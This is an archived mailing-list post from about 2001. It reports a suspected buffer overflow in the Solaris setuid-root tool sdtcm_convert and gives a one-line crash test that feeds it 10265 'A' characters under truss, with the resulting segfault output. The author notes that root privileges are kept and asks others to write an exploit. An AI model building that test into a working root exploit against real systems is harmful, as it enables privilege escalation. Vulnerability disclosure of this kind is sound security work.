/usr/dt/bin/sdtcm_convert seems to have a buffer-overflow. Cut'n paste the text below to test for it: --- cd /tmp cp /usr/dt/bin/sdtcm_convert test truss -o blaha ./test -d /tmp `perl -e 'print "A"x10265'` tail -5 blaha --- This is what I get: --- Incurred fault #6, FLTBOUNDS %pc = 0xEF4E2EA0 siginfo: SIGSEGV SEGV_MAPERR addr=0x41004EFC Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41004EFC *** process killed *** ^^------- ASCII-code for 'A' --- If I use print "A"x10268 all of the address is 0x41's. No setuid() in the truss-output, so it does not drop root-privs either.. If I have totally misunderstood something here please let me know, and if someone manages to write an exploit for it please send it to me. :-) I 've tried myself but it's not going too well .. :-P /Joel Eriksson
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:50 PDT